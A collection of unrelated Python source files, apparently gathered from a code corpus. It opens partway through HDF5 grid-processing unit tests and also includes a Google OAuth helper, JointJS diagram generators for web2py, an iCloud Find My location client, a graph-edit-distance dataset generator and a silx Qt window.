if grid1.signals[i].name not in info["copy"]:
data = data / norm
np.testing.assert_array_equal(data, grid2[index])
def test_resample(self):
with self._nxprocess(method="resample") as proc1:
proc1, info = proc1
params = ((["y"], ["y", "z"]), (True, False))
for i, p in enumerate(itertools.product(*params), 1):
axes, crop = p
encoders = {k: v for k, v in info["encoders"].items() if k in axes}
parameters = {
"name": "crop{}".format(i),
"method": "resample",
"encoders": encoders,
"crop": crop,
}
proc2 = self._run_task(parameters, proc1)
grid1 = h5regulargrid.NXRegularGrid(proc1)
grid2 = h5regulargrid.NXRegularGrid(proc2)
# Check new axes position
encoder_signals = {}
offsets = proc2.results["encoder_offset"].read().tolist()
offsets.insert(grid2.stackdim, 0)
for ax1, ax2, offset in zip(grid1.axes, grid2.axes, offsets):
name = ax1.name
if name in axes:
n = int(np.ceil(info["shift"][name] / 2.0))
if crop:
ax1 = axis.factory(ax1[n:-n])
else:
add = np.arange(1, n + 1) * ax1.stepsize
addstart = ax1.start - add[::-1]
addend = ax1.end + add
x = (
addstart.magnitude.tolist()
+ ax1.magnitude.tolist()
+ addend.magnitude.tolist()
)
ax1 = axis.factory(units.Quantity(x, units=ax1.units))
resolution = units.Quantity(
parameters["encoders"][name]["resolution"],
units=1 / ax2.units,
)
encoder_signals[name] = (
(ax2.values * resolution + offset)
.to("dimensionless")
.magnitude
)
self._check_axis(ax1, ax2)
# Check encoder signals
signals = grid2.signal_names
for axname, encinfo in encoders.items():
i = signals.index(encinfo["counter"])
enc = grid2[i, ...]
encnan = np.isnan(enc)
self.assertTrue(crop ^ encnan.any())
# Expected encoder values
encvalues = encoder_signals[axname]
index = [np.newaxis] * enc.ndim
if axname == "y":
index[1] = slice(None)
else:
index[2] = slice(None)
encvalues = encvalues[tuple(index)]
# Handle nan's
if not crop:
m = np.ones(enc.shape)
m[encnan] = np.nan
encvalues = encvalues * m
encvalues[encnan] = 999
enc[encnan] = 999
self.assertTrue(np.isclose(enc, encvalues).all())
def test_copy(self):
with self._nxprocess(method="copy") as proc1:
proc1, info = proc1
copy = [{"method": "regex", "pattern": name} for name in info["copy"]]
skip = [{"method": "regex", "pattern": name} for name in info["skip"]]
parameters = {
"method": "expression",
"expression": info["expression"],
"copy": copy,
"skip": skip,
"sliced": False,
}
proc2 = self._run_task(parameters, proc1)
parameters["sliced"] = True
proc3 = self._run_task(parameters, proc1)
self._check_reproc(proc2, proc3)
grid1 = h5regulargrid.NXRegularGrid(proc2)
grid2 = h5regulargrid.NXRegularGrid(proc2)
signals1 = {s.name for s in grid1.signals if s.name not in info["skip"]}
signals2 = {s.name for s in grid2.signals}
self.assertEqual(signals1, signals2)
index = [None] * grid2.ndim
for s2 in grid2.signals:
for s1 in grid1.signals:
if s1.name == s2.name and s1.parent.name == s2.parent.name:
break
index[grid1.stackdim] = s1
index1 = grid1.locate(*index)
index[grid2.stackdim] = s2
index2 = grid2.locate(*index)
np.testing.assert_array_equal(grid1[index1], grid2[index2])
@unittest.skip("h5py doesn't fully support concurrency")
def test_concurrency(self):
with self._nxprocess(method="copy") as proc1:
proc1, info = proc1
copy = [{"method": "regex", "pattern": name} for name in info["copy"]]
skip = [{"method": "regex", "pattern": name} for name in info["skip"]]
parameters = {
"method": "expression",
"expression": info["expression"],
"copy": copy,
"skip": skip,
"sliced": False,
}
previoustask = utils.nxpathtotask(proc1)
tasks = []
threads = []
nthreads = 5
for i in range(nthreads):
newtask = utils.create_task(dependencies=previoustask, **parameters)
tasks.append(newtask)
t = threading.Thread(target=newtask.run)
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
output = tasks[0].output
for task in tasks:
self.assertFalse(newtask.done)
self.assertEqual(newtask.output, output)
proc1.root.ls(recursive=True)
def test_scenevis(self):
with self._nxprocess(method="scenevis") as proc1:
proc1, info = proc1
outputparent = proc1.root["images"]
obj1 = {
"items": [
("detector00/Fe-K", 0),
("detector00/Si-K", 0),
("detector00/Al-K", 0),
]
}
parameters = {
"method": "scenevis",
"outputparent": outputparent,
"objects": [obj1],
"instrument": "sxm",
"title": "title1",
"plot": False,
}
proc2 = self._run_task(parameters, proc1)
parameters["title"] = "title2"
proc3 = self._run_task(parameters, proc1)
self._check_reproc(proc2, proc3)
def _check_axes(self, grid1, grid2):
for ax1, ax2 in zip(grid1.axes, grid2.axes):
self._check_axis(ax1, ax2)
def _check_axis(self, ax1, ax2):
if ax1.type == "quantitative":
self.assertEqual(ax1, ax2)
else:
self.assertEqual(len(ax1), len(ax2))
for v1, v2 in zip(ax1, ax2):
self.assertEqual(v1.name, v2.name)
def _check_grid(self, grid):
data = grid.values
self.assertEqual(grid.shape, data.shape)
self.assertEqual(grid.ndim, data.ndim)
self.assertEqual(grid.size, data.size)
np.testing.assert_array_equal(grid[:], data)
indices = genindexing.genindexingn(
data.shape, advanced=False, eco=False, nmax=50
)
for index in indices:
np.testing.assert_array_equal(grid[index], data[index])
for a, b in zip(grid, data):
np.testing.assert_array_equal(a, b)
def test_suite():
"""Test suite including all test suites"""
testSuite = unittest.TestSuite()
testSuite.addTest(test_task_generic("test_grid"))
testSuite.addTest(test_task_generic("test_copy"))
testSuite.addTest(test_task_generic("test_concurrency"))
testSuite.addTest(test_task_generic("test_crop"))
testSuite.addTest(test_task_generic("test_replace"))
testSuite.addTest(test_task_generic("test_minlog"))
testSuite.addTest(test_task_generic("test_align"))
testSuite.addTest(test_task_generic("test_expression"))
testSuite.addTest(test_task_generic("test_resample"))
testSuite.addTest(test_task_generic("test_scenevis"))
return testSuite
if __name__ == "__main__":
import sys
mysuite = test_suite()
runner = unittest.TextTestRunner()
if not runner.run(mysuite).wasSuccessful():
sys.exit(1)
|
from os import getenv
from utils.etc import REQ_TYPE, request
async def get_token(code: str) -> dict:
return await request(
REQ_TYPE.POST,
url="https://oauth2.googleapis.com/token",
data={
"code": code,
"client_id": getenv("GOOGLE_CLIENT_ID"),
"client_secret": getenv("GOOGLE_CLIENT_SECRET"),
"redirect_uri": getenv("GOOGLE_REDIRECT_URI"),
"grant_type": "authorization_code",
},
)
async def get_user_info(token: str) -> dict:
return await request(
REQ_TYPE.GET,
url="https://www.googleapis.com/userinfo/v2/me",
headers={"Authorization": f"Bearer {token}"},
)
|
class Task(object):
def __init__(self, task_name):
self.task_name = task_name
class Assignment(object):
"""The work assignment
Contains an identifier, a description and a set of ExportActions.
"""
def __init__(self, identifier, description="", export_actions=None):
if ' ' in identifier:
raise ValueError
if export_actions is None:
export_actions = []
self.identifier = identifier
self.description = description
self.export_actions = export_actions
|
# - Coding UTF8 -
#
# Networked Decision Making
# Site: http://code.google.com/p/global-decision-making-system/
#
# License Code: GPL, General Public License v. 2.0
# License Content: Creative Commons Attribution 3.0
#
# Also visit: www.web2py.com
# or Groups: http://groups.google.com/group/web2py
# For details on the web framework used for this development
#
# Developed by Russ King (newglobalstrategy@gmail.com
# Russ also blogs occasionally to pass the time at proudofyourplanent.blogspot.com
# His general thinking on why this project is very important is availalbe at
# http://www.scribd.com/doc/98216626/New-Global-Strategy
from decimal import *
from gluon import XML
def initgraph(width=1000, height=1000):
txt = r'''
var graph = new joint.dia.Graph;
var paper = new joint.dia.Paper({
el: $('#map'),
width: %d,
height: %d,
model: graph,
defaultLink: new joint.dia.Link({
attrs: { '.marker-target': { d: 'M 10 0 L 0 5 L 10 10 z', fill: 'green' },
'.connection': { stroke: 'green', 'stroke-width': 5 }}
}),
validateConnection: function(cellViewS, magnetS, cellViewT, magnetT, end, linkView) {
return (magnetS !== magnetT);
},
snapLinks: { radius: 75 }
''' % (width, height)
return XML(txt)
def portangle(objname, posx, posy, text='default', fillcolour='blue', fontsize=10, width=140, height=140, ports='tb', textcolour = 'black' ):
if ports == 'tb' and width == 160:
txt = r''' var %s = new joint.shapes.devs.Model({
id: '%s',
position: { x: %d, y: %d },
size: { width: %d, height: %d },
inPorts: ['t'],
outPorts: ['b'],
attrs: {'.label': { text: '%s', fill:'%s', 'font-size': %d,'ref-x': .12 },
rect: { fill: '%s' },
'.inPorts circle': { fill: '#16A085' }, '.inPorts': {transform: 'rotate(-87)', 'ref-x':-3.0,'ref-y':5.0},
'.outPorts circle': { fill: '#16A085' },'.outPorts': {transform: 'rotate(28)', 'ref-x':4.0,'ref-y':50.0}}
});
''' % (objname, objname, posx, posy, width, height, text, textcolour, fontsize, fillcolour)
elif ports == 'tb':
txt = r''' var %s = new joint.shapes.devs.Model({
id: '%s',
position: { x: %d, y: %d },
size: { width: %d, height: %d },
inPorts: ['t'],
outPorts: ['b'],
attrs: {'.label': { text: '%s', fill: '%s', 'font-size': %d,'ref-x': .12 },
rect: { fill: '%s' },
'.inPorts circle': { fill: '#16A085' }, '.inPorts': {transform: 'rotate(-91)', 'ref-x':48.0,'ref-y':10.0},
'.outPorts circle': { fill: '#16A085' },'.outPorts': {transform: 'rotate(38)', 'ref-x':4.0,'ref-y':-20.0}}
});
''' % (objname, objname, posx, posy, width, height, text, textcolour, fontsize, fillcolour)
elif ports == 'b':
txt = r''' var %s = new joint.shapes.devs.Model({
id: '%s',
position: { x: %d, y: %d },
size: { width: %d, height: %d },
outPorts: ['b'],
attrs: {'.label': { text: '%s', fill: '%s', 'font-size': %d,'ref-x': .12 }, rect: { fill: '%s' },
'.outPorts circle': { fill: '#16A085' },'.outPorts': {transform: 'rotate(35)'}}
});
''' % (objname, objname, posx, posy, width, height, text, textcolour, fontsize, fillcolour)
elif ports == 't':
txt = r''' var %s = new joint.shapes.devs.Model({
id: '%s',
position: { x: %d, y: %d },
size: { width: %d, height: %d },
inPorts: ['t'],
attrs: {'.label': { text: '%s', fill: '%s', 'font-size': %d,'ref-x': .12 }, rect: { fill: '%s' },
'.inPorts circle': { fill: '#16A085' }, '.inPorts': {transform: 'rotate(-90)'}}
});
''' % (objname, objname, posx, posy, width, height, text, textcolour, fontsize, fillcolour)
else: # ports == 'lr':
txt = r''' var %s = new joint.shapes.devs.Model({
id: '%s',
position: { x: %d, y: %d },
size: { width: %d, height: %d },
inPorts: ['l'],
outPorts: ['r'],
attrs: {'.label': { text: '%s', fill: '%s', 'font-size': %d,'ref-x': .12 },
rect: { fill: '%s' },
'.inPorts circle': { fill: '#16A085' }, '.inPorts': {transform: 'rotate(0)'},
'.outPorts circle': { fill: '#16A085' },'.outPorts': {transform: 'rotate(0)'}}
});
''' % (objname, objname, posx, posy, width, height, text, textcolour, fontsize, fillcolour)
return XML(txt)
def smallangle(objname, posx, posy, text='default', fillcolour='blue', fontsize=10, width=140, height=140, ports='tb',
link='http://bla.com', textcolour = 'white'):
txt = r''' var %s = new joint.shapes.custom.ElementLink({
id: '%s',
position: { x: %d, y: %d },
size: { width: %d, height: %d },
attrs: { rect: { fill: '%s' },
a: { 'xlink:href': '%s', cursor: 'pointer' },
text: { text: '%s', fill: '%s', 'font-size': %d}}
});
''' % (objname, objname, posx, posy, width, height, fillcolour, link, text, textcolour, fontsize)
return XML(txt)
def linkangle(objname, posx, posy, text='default', fillcolour='blue', fontsize=10, width=140, height=140, ports='tb',
link='http://bla.com'):
txt = r''' var %s = new joint.shapes.custom.ElementLink({
id: '%s',
position: { x: %d, y: %d },
size: { width: %d, height: %d },
attrs: { rect: { fill: '%s' },
a: { 'xlink:href': '%s', cursor: 'pointer' },
text: { text: '%s', fill: 'white', 'font-size': %d}}
});
''' % (objname, objname, posx, posy, width, height, fillcolour, link, text, fontsize)
return XML(txt)
def rectangle(objname, posx, posy, text='default', fillcolour='blue', fontsize=10, width=140, height=140, ports='notused' ):
txt = r''' var %s = new joint.shapes.basic.Rect({
position: { x: %d, y: %d },
size: { width: %d, height: %d },
attrs: { rect: { fill: '%s' }, text: { text: '%s', fill: 'white', 'font-size': %d } }
});
''' % (objname, posx, posy, width, height, fillcolour, text, fontsize)
return XML(txt)
def link(objname, source='rect', target='rect0', sourceport='b', targetport='t'):
txt = r''' var %s = new joint.dia.Link({
source: { id: %s.id,
port: '%s' },
target: { id: %s.id,
port: '%s' },
attrs: { '.connection': { stroke: 'yellow', 'stroke-width': 5, 'stroke-dasharray': '5 3' },
'.marker-target': { fill: 'yellow', d: 'M 10 0 L 0 5 L 10 10 z' }}
});
''' % (objname, source, sourceport, target, targetport)
return XML(txt)
def metrolink(objname, source='rect', target='rect0', sourceport='b', targetport='t'):
txt = r''' var %s = new joint.dia.Link({
source: { id: %s.id,
port: '%s' },
target: { id: %s.id,
port: '%s' },
attrs: { '.connection': { stroke: 'yellow', 'stroke-width': 5, 'stroke-dasharray': '5 3' },
'.marker-target': { fill: 'yellow', d: 'M 10 0 L 0 5 L 10 10 z' }}
});
%s.set('router', { name: 'metro' });
%s.set('connector', { name: 'rounded', args: { radius: 60 }});
''' % (objname, source, sourceport, target, targetport, objname, objname)
return XML(txt)
def newmetlink(objname, source='rect', target='rect0', sourceport='b', targetport='t', dasharray=False,
linethickness=5):
if dasharray:
txt = r''' var %s = new joint.dia.Link({
source: { id: %s.id,
port: '%s' },
target: { id: %s.id,
port: '%s' },
attrs: { '.connection': { stroke: 'yellow', 'stroke-width': %d, 'stroke-dasharray': '5 3' },
'.marker-target': { fill: 'yellow', d: 'M 10 0 L 0 5 L 10 10 z' }}
});
%s.set('router', { name: 'metro' });
%s.set('connector', { name: 'rounded', args: { radius: 60 }});
''' % (objname, source, sourceport, target, targetport, linethickness, objname, objname)
else:
txt = r''' var %s = new joint.dia.Link({
source: { id: %s.id,
port: '%s' },
target: { id: %s.id,
port: '%s' },
attrs: { '.connection': { stroke: 'yellow', 'stroke-width': %d},
'.marker-target': { fill: 'yellow', d: 'M 10 0 L 0 5 L 10 10 z' }}
});
%s.set('router', { name: 'metro' });
%s.set('connector', { name: 'rounded', args: { radius: 60 }});
''' % (objname, source, sourceport, target, targetport, linethickness, objname, objname)
return XML(txt)
def addobjects(objlist):
txt = r'[rect,rect0, rect2, rect3, link, link1,link2]'
return XML(txt)
def colourcode(qtype, status, priority):
"""This returns a colour in rgba format for colour coding the
nodes on the network
>>> colourcode('quest','inprogress',100)
'rgba(140,80,20,100)'
>>> colourcode('quest','inprogress',0)
'rgba(80,100,60,100)'
>>> colourcode('quest','resolved',100)
'rgba(120,255,70,70)'
>>> colourcode('action','inprogress',0)
'rgba(80,230,250,70)'
"""
if qtype == 'action' and status == 'In Progress':
# is this ok
colourstr = 'rgb(80,230,250)'
elif qtype == 'quest' and status == 'Resolved':
colourstr = 'rgb(40,100,1)'
else:
priority = Decimal(priority)
colourstr = ('rgb(' + redfnc(priority) + ',' + greenfnc(priority) + ','
+ bluefnc(priority) + ')')
return colourstr
def textcolour(qtype, status, priority):
"""This returns a colour for the text on the question
nodes on the network
Aiming to get good contrast between background and text in due course
"""
if qtype == 'action' and status == 'In Progress':
# is this ok
textcolourstring = 'white'
elif qtype == 'quest' and status == 'Resolved':
textcolourstring = 'white'
else:
textcolourstring = 'black'
return textcolourstring
# plan is to set this up to go from a range of rgb at 0 to 100 priority and range is rgb(80,100,60) to 140,80,20 -
# now revised based on inital thoughts.xlsm
def redfnc(priority):
#colint= int(90 + (priority * Decimal(1.6)))
colint = 255
return str(colint)
def greenfnc(priority):
colint = min(int(500 - priority * Decimal(5.0)), 255)
return str(colint)
def bluefnc(priority):
"""Return the position of an object in position p on heading h (unit vector after time t if travelling at speed s
>>> bluefnc(100)
'20'
"""
colint = max(int(100 - (priority * Decimal(2.0))), 0)
return str(colint)
def _test():
import doctest
doctest.testmod()
if __name__ == '__main__':
# Can run with -v option if you want to confirm tests were run
_test()
|
# Copyright 2018, Michael DeHaan LLC
# License: Apache License Version 2.0
# -------------------------------------------------------------------------
# output.py - applies all output plugins to a message. Output plugins
# can be used to format build output or also redirect it to additional
# sources.
# --------------------------------------------------------------------------
from vespene.common.logger import Logger
from vespene.common.plugin_loader import PluginLoader
LOG = Logger()
class OutputManager(object):
def __init__(self):
self.plugin_loader = PluginLoader()
self.plugins = self.plugin_loader.get_output_plugins()
def get_msg(self, build, msg):
for p in self.plugins:
msg = p.filter(build, msg)
return msg
|
import os, logging, time, json, urllib, socket
from http.cookiejar import MozillaCookieJar
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
class AppleFindMy():
terminate = False
online = True
username = None
password = None
deviceId = None
deviceName = None
cookiejar = None
loggedin = False
findmeBaseURL = None
serverContext = None
interval = 5
lastLookup = 0
def __init__(self):
self.cookiejar = MozillaCookieJar(os.path.dirname(os.path.realpath(__file__)) + '/../.cookies.txt')
try:
self.cookiejar.load()
except OSError as e:
if e.errno == 2:
self.cookiejar.save()
else:
logger.error(e)
def stop(self):
self.terminate = True
def online(self, online = True):
self.online = online
def offline(self, offline = True):
self.online = not offline
def login(self):
if not self.online:
return False
url = 'https://setup.icloud.com/setup/ws/1/accountLogin'
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',
'Content-Type': 'text/plain;charset=UTF-8',
'Accept': '*/*',
'Origin': 'https://www.icloud.com',
'Referer': 'https://www.icloud.com/',
'Accept-Language': 'en-UK,en;q=0.9,en-US;q=0.8'
}
requestData = '{"appName":"find","apple_id":"' + self.username + '","password":"' + self.password + '"}'
requestData = requestData.encode('utf-8')
try:
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(self.cookiejar))
urllib.request.install_opener(opener)
request = urllib.request.Request(url, requestData, headers)
with urllib.request.urlopen(request, timeout=5) as response:
responseData = response.read().decode(response.headers.get_content_charset(failobj = 'utf-8'))
# logger.debug(responseData)
responseData = json.loads(responseData)
self.findmeBaseURL = responseData['webservices']['findme']['url']
self.cookiejar.save()
except urllib.error.HTTPError as e:
logger.error(e.code)
return False
except urllib.error.URLError as e:
logger.error(e)
return False
except socket.timeout as e:
logger.error(e)
return False
self.loggedin = True
return True
def getLocation(self):
if not self.online:
return None
if not self.loggedin and not self.login():
return None
elapsedTime = time.time() - self.lastLookup
if elapsedTime < self.interval:
return None
location = None
url = self.findmeBaseURL + '/fmipservice/client/web/refreshClient'
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',
'Content-Type': 'text/plain',
'Accept': '*/*',
'Origin': 'https://www.icloud.com',
'Referer': 'https://www.icloud.com/',
'Accept-Language': 'en-UK,en;q=0.9,en-US;q=0.8'
}
requestData = {}
if(self.serverContext):
requestData['serverContext'] = self.serverContext
requestData['clientContext'] = json.loads('{"appName":"iCloud Find (Web)","appVersion":"2.0","timezone":"Europe/Amsterdam","inactiveTime":2,"apiVersion":"3.0","deviceListVersion":1,"fmly":true,"shouldLocate":true}')
if(self.deviceId):
requestData['clientContext']['selectedDevice'] = self.deviceId
else:
requestData['clientContext']['selectedDevice'] = 'all'
requestData = json.dumps(requestData)
requestData = bytes(requestData, 'utf-8')
# logger.debug(requestData)
try:
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(self.cookiejar))
urllib.request.install_opener(opener)
request = urllib.request.Request(url, requestData, headers)
with urllib.request.urlopen(request, timeout=1) as response:
responseData = response.read().decode(response.headers.get_content_charset(failobj = 'utf-8'))
# logger.debug(responseData)
responseData = json.loads(responseData)
self.serverContext = responseData['serverContext']
for device in responseData['content']:
if not self.deviceId and not self.deviceName:
logger.info("{} - {}".format(device['id'], device['name']))
elif self.deviceId and device['id'] == self.deviceId:
break
elif self.deviceName and device['name'] == self.deviceName:
break
device = None
if not self.deviceId and not self.deviceName:
return None
if not device:
logger.error("No device found")
return None
if device and 'location' in device and device['location']:
latitude = device['location']['latitude']
longitude = device['location']['longitude']
accuracy = device['location']['horizontalAccuracy']
altitude = device['location']['altitude']
location = [latitude, longitude, accuracy, altitude]
# logger.debug(location)
else:
logger.error("No location found in device {} \"{}\"".format(device['id'], device['name']))
logger.debug(device)
self.cookiejar.save()
except urllib.error.HTTPError as e:
if e.code == 404:
logger.warning("Not found {}".format(url))
else:
logger.error(e.code)
return None
except urllib.error.URLError as e:
logger.error(e)
return None
except socket.timeout as e:
logger.error(e)
return None
self.lastLookup = time.time()
return location
|
import abc
import contextlib
import random
import collections
import copy
import numpy as np
import networkx as nx
"""A general Interface"""
class GraphSimilarityDataset(object):
"""Base class for all the graph similarity learning datasets.
This class defines some common interfaces a graph similarity dataset can have,
in particular the functions that creates iterators over pairs and triplets.
"""
@abc.abstractmethod
def triplets(self, batch_size):
"""Create an iterator over triplets.
Args:
batch_size: int, number of triplets in a batch.
Yields:
graphs: a `GraphData` instance. The batch of triplets put together. Each
triplet has 3 graphs (x, y, z). Here the first graph is duplicated once
so the graphs for each triplet are ordered as (x, y, x, z) in the batch.
The batch contains `batch_size` number of triplets, hence `4*batch_size`
many graphs.
"""
pass
@abc.abstractmethod
def pairs(self, batch_size):
"""Create an iterator over pairs.
Args:
batch_size: int, number of pairs in a batch.
Yields:
graphs: a `GraphData` instance. The batch of pairs put together. Each
pair has 2 graphs (x, y). The batch contains `batch_size` number of
pairs, hence `2*batch_size` many graphs.
labels: [batch_size] int labels for each pair, +1 for similar, -1 for not.
"""
pass
"""Graph Edit Distance Task"""
# Graph Manipulation Functions
def permute_graph_nodes(g):
"""Permute node ordering of a graph, returns a new graph."""
n = g.number_of_nodes()
new_g = nx.Graph()
new_g.add_nodes_from(range(n))
perm = np.random.permutation(n)
edges = g.edges()
new_edges = []
for x, y in edges:
new_edges.append((perm[x], perm[y]))
new_g.add_edges_from(new_edges)
return new_g
def substitute_random_edges(g, n):
"""Substitutes n edges from graph g with another n randomly picked edges."""
g = copy.deepcopy(g)
n_nodes = g.number_of_nodes()
edges = list(g.edges())
# sample n edges without replacement
e_remove = [
edges[i] for i in np.random.choice(np.arange(len(edges)), n, replace=False)
]
edge_set = set(edges)
e_add = set()
while len(e_add) < n:
e = np.random.choice(n_nodes, 2, replace=False)
# make sure e does not exist and is not already chosen to be added
if (
(e[0], e[1]) not in edge_set
and (e[1], e[0]) not in edge_set
and (e[0], e[1]) not in e_add
and (e[1], e[0]) not in e_add
):
e_add.add((e[0], e[1]))
for i, j in e_remove:
g.remove_edge(i, j)
for i, j in e_add:
g.add_edge(i, j)
return g
class GraphEditDistanceDataset(GraphSimilarityDataset):
"""Graph edit distance dataset."""
def __init__(
self,
n_nodes_range,
p_edge_range,
n_changes_positive,
n_changes_negative,
permute=True,
):
"""Constructor.
Args:
n_nodes_range: a tuple (n_min, n_max). The minimum and maximum number of
nodes in a graph to generate.
p_edge_range: a tuple (p_min, p_max). The minimum and maximum edge
probability.
n_changes_positive: the number of edge substitutions for a pair to be
considered positive (similar).
n_changes_negative: the number of edge substitutions for a pair to be
considered negative (not similar).
permute: if True (default), permute node orderings in addition to
changing edges; if False, the node orderings across a pair or triplet of
graphs will be the same, useful for visualization.
"""
self._n_min, self._n_max = n_nodes_range
self._p_min, self._p_max = p_edge_range
self._k_pos = n_changes_positive
self._k_neg = n_changes_negative
self._permute = permute
def _get_graph(self):
"""Generate one graph."""
n_nodes = np.random.randint(self._n_min, self._n_max + 1)
p_edge = np.random.uniform(self._p_min, self._p_max)
# do a little bit of filtering
n_trials = 100
for _ in range(n_trials):
g = nx.erdos_renyi_graph(n_nodes, p_edge)
if nx.is_connected(g):
return g
raise ValueError("Failed to generate a connected graph.")
def _get_pair(self, positive):
"""Generate one pair of graphs."""
g = self._get_graph()
if self._permute:
permuted_g = permute_graph_nodes(g)
else:
permuted_g = g
n_changes = self._k_pos if positive else self._k_neg
changed_g = substitute_random_edges(g, n_changes)
return permuted_g, changed_g
def _get_triplet(self):
"""Generate one triplet of graphs."""
g = self._get_graph()
if self._permute:
permuted_g = permute_graph_nodes(g)
else:
permuted_g = g
pos_g = substitute_random_edges(g, self._k_pos)
neg_g = substitute_random_edges(g, self._k_neg)
return permuted_g, pos_g, neg_g
def triplets(self, batch_size):
"""Yields batches of triplet data."""
while True:
batch_graphs = []
for _ in range(batch_size):
g1, g2, g3 = self._get_triplet()
batch_graphs.append((g1, g2, g1, g3))
yield self._pack_batch(batch_graphs)
def pairs(self, batch_size):
"""Yields batches of pair data."""
while True:
batch_graphs = []
batch_labels = []
positive = True
for _ in range(batch_size):
g1, g2 = self._get_pair(positive)
batch_graphs.append((g1, g2))
batch_labels.append(1 if positive else -1)
positive = not positive
packed_graphs = self._pack_batch(batch_graphs)
labels = np.array(batch_labels, dtype=np.int32)
yield packed_graphs, labels
def _pack_batch(self, graphs):
"""Pack a batch of graphs into a single `GraphData` instance.
Args:
graphs: a list of generated networkx graphs.
Returns:
graph_data: a `GraphData` instance, with node and edge indices properly
shifted.
"""
Graphs = []
for graph in graphs:
for inergraph in graph:
Graphs.append(inergraph)
graphs = Graphs
from_idx = []
to_idx = []
graph_idx = []
n_total_nodes = 0
n_total_edges = 0
for i, g in enumerate(graphs):
n_nodes = g.number_of_nodes()
n_edges = g.number_of_edges()
edges = np.array(g.edges(), dtype=np.int32)
# shift the node indices for the edges
from_idx.append(edges[:, 0] + n_total_nodes)
to_idx.append(edges[:, 1] + n_total_nodes)
graph_idx.append(np.ones(n_nodes, dtype=np.int32) * i)
n_total_nodes += n_nodes
n_total_edges += n_edges
GraphData = collections.namedtuple('GraphData', [
'from_idx',
'to_idx',
'node_features',
'edge_features',
'graph_idx',
'n_graphs'])
return GraphData(
from_idx=np.concatenate(from_idx, axis=0),
to_idx=np.concatenate(to_idx, axis=0),
# this task only cares about the structures, the graphs have no features.
# setting higher dimension of ones to confirm code functioning
# with high dimensional features.
node_features=np.ones((n_total_nodes, 8), dtype=np.float32),
edge_features=np.ones((n_total_edges, 4), dtype=np.float32),
graph_idx=np.concatenate(graph_idx, axis=0),
n_graphs=len(graphs),
)
# Use Fixed datasets for evaluation
@contextlib.contextmanager
def reset_random_state(seed):
"""This function creates a context that uses the given seed."""
np_rnd_state = np.random.get_state()
rnd_state = random.getstate()
np.random.seed(seed)
random.seed(seed + 1)
try:
yield
finally:
random.setstate(rnd_state)
np.random.set_state(np_rnd_state)
class FixedGraphEditDistanceDataset(GraphEditDistanceDataset):
"""A fixed dataset of pairs or triplets for the graph edit distance task.
This dataset can be used for evaluation.
"""
def __init__(
self,
n_nodes_range,
p_edge_range,
n_changes_positive,
n_changes_negative,
dataset_size,
permute=True,
seed=1234,
):
super(FixedGraphEditDistanceDataset, self).__init__(
n_nodes_range,
p_edge_range,
n_changes_positive,
n_changes_negative,
permute=permute,
)
self._dataset_size = dataset_size
self._seed = seed
def triplets(self, batch_size):
"""Yield triplets."""
if hasattr(self, "_triplets"):
triplets = self._triplets
else:
# get a fixed set of triplets
with reset_random_state(self._seed):
triplets = []
for _ in range(self._dataset_size):
g1, g2, g3 = self._get_triplet()
triplets.append((g1, g2, g1, g3))
self._triplets = triplets
ptr = 0
while ptr + batch_size <= len(triplets):
batch_graphs = triplets[ptr: ptr + batch_size]
yield self._pack_batch(batch_graphs)
ptr += batch_size
def pairs(self, batch_size):
"""Yield pairs and labels."""
if hasattr(self, "_pairs") and hasattr(self, "_labels"):
pairs = self._pairs
labels = self._labels
else:
# get a fixed set of pairs first
with reset_random_state(self._seed):
pairs = []
labels = []
positive = True
for _ in range(self._dataset_size):
pairs.append(self._get_pair(positive))
labels.append(1 if positive else -1)
positive = not positive
labels = np.array(labels, dtype=np.int32)
self._pairs = pairs
self._labels = labels
ptr = 0
while ptr + batch_size <= len(pairs):
batch_graphs = pairs[ptr: ptr + batch_size]
packed_batch = self._pack_batch(batch_graphs)
yield packed_batch, labels[ptr: ptr + batch_size]
ptr += batch_size
|
#!/usr/bin/env python
# coding: utf-8
"""
QMainWindow based on :mod:`silx.examples.customHdf5TreeModel`
"""
import os
from silx.gui import qt
from sloth import _resourcesPath
from .view import TreeView
from .model import TreeModel
from sloth.gui.plot.plotarea import PlotArea # sloth version
from sloth.gui.console import InternalIPyKernel
from sloth.utils.logging import getLogger
logger = getLogger('sloth.gui.daxs.windowHdf5Tree')
class MainWindowHdf5Tree(qt.QMainWindow):
"""MainWindow based on Hdf5TreeView
"""
def __init__(self, app, parent=None, with_ipykernel=True):
"""
Constructor
"""
super(MainWindowHdf5Tree, self).__init__(parent=parent)
self._app = app
self._with_ipykernel = with_ipykernel
"""Store main application and IPython kernel status"""
self._menuBar = qt.QMenuBar()
self.setMenuBar(self._menuBar)
self._initAppMenu()
"""Add minimal menu bar with Quit action"""
ico = qt.QIcon(os.path.join(_resourcesPath, "logo",
"xraysloth_logo_04.svg"))
self.setWindowIcon(ico)
self.setWindowTitle("sloth-daxs")
"""Set window title and icon"""
self._view = TreeView(self)
"""Inherited from SILX TreeView view"""
self._model = TreeModel()
"""Inherited from SILX TreeModel model
.. note:: in silx.examples.customHdf5TreeModel there are two options:
- original model::
# in __init__
self.__treeview = Hdf5TreeView()
self.__sourceModel = self.__treeview.model()
# in __useOriginalModel
self.__treeview.setModel(self.__sourceModel)
- custom model::
# in __init__
self.__treeview = Hdf5TreeView()
self.__sourceModel = self.__treeview.model()
# in __useCustomModel
customModel = CustomTooltips(self.__treeview)
# CustomTooltips is qt.QIdentityProxyModel
customModel.setSourceModel(self.__sourceModel)
self.__treeview.setModel(customModel)
"""
self._view.setModel(self._model)
"""Set the model to the view"""
self._plotArea = PlotArea()
self.setCentralWidget(self._plotArea)
"""Plot Area storing all plot windows"""
self._dockWidget = qt.QDockWidget(parent=self)
self._dockWidget.setObjectName('Data TreeView')
self._dockWidget.setWidget(self._view)
self.addDockWidget(qt.Qt.TopDockWidgetArea, self._dockWidget)
"""TreeView dock widget"""
if self._with_ipykernel:
# Initialize internal ipykernel
self._ipykernel = InternalIPyKernel()
self._ipykernel.init_kernel(backend='qt')
"""IPython kernel part of the GUI application (= internal)"""
